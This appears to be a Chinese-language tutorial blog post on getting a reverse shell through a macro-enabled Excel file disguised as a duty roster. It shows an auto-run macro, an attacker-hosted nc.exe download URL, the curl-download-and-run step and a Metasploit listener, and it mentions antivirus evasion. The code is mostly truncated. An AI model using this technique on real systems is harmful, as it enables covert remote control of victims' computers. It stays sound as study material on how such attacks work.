反弹Shell:通过Excel表格进行远控
讲在前面
很久没有更新啦,自从12月新冠开始再加上过年和开学考试再加上亿点点的划水,不知不觉就过去这么久了。那么今天刚好开完了社团的分享会,也一起在这里更新一下内容,也算是作为这次分享的记录了。
什么是宏?
Office宏,译自英文单词Macro。宏是Office自带的一种高级脚本特性,通过VBA代码,可以在Office中去完成某项特定的任务,而不必再重复相同的动作,目的是让用户文档中的一些任务自动化。
Visual Basic for Applications(VBA)是Visual Basic的一种宏语言,是微软开发出来在其桌面应用程序中执行通用的自动化(OLE)任务的编程语言。主要能用来扩展Windows的应用程序功能,特别是Microsoft Office软件,也可说是一种应用程式视觉化的Basic 脚本。
如何利用?
我们创建一个启用宏的excel表格,例如值日名单.xlsm
。
点击视图
-宏
-查看宏
,在这里创建一个AutoOpen
1.弹出计算器
在弹出的VBA中,修改为如下代码,点击运行,即可弹出计算器。
1 | Sub AutoOpen() |
原理其实就是在shell中输入calc
,启动计算器。
启动Excel时自动执行
在左侧ThisWorkbook
中添加如下代码:
1 | Private Sub Workbook_Open() |
可以令excel在启动时自动运行AutoOpen
2.浏览器全屏访问指定网页
以火狐浏览器为例:
代码如下,其中
firefoxPath
是指火狐浏览器的安装路径。
websiteURL
是指要打开的网页。
--kiosk
是指定浏览器全屏模式启动,也可以修改为-url
以普通模式启动。
1 | Sub AutoOpen() |
3.利用反弹shell控制
在KALI(IP:192.168.80.128) 中生成nc.exe
,具体过程不再详细叙述,给出命令行如下:
1 | cd /var/www/html |
现在在/var/www/html
路径下有nc.exe
文件,我们需要它能够在Windows上被下载,所以我们启动web服务:
1 | systemctl start apache2.service |
如果此时在Windows浏览器中打开:http://192.168.80.128/nc.exe
,文件就可以被下载了。
回到Excel中,修改代码如下:
原理同上,就是使用curl
帮我们下载文件,然后在cmd中直接运行。
1 | Sub AutoOpen() |
与此同时,在KALI上需要开启监听:
1 | msfconsole |
这样,当Excel表格在启动时就会自动连接至攻击机,渗透完成。
当然,对nc.exe
做一下免杀效果会更好,如果以后有机会我会在这里继续更新一下,
本测试仅作学习原理探究,严禁去做违法的事情!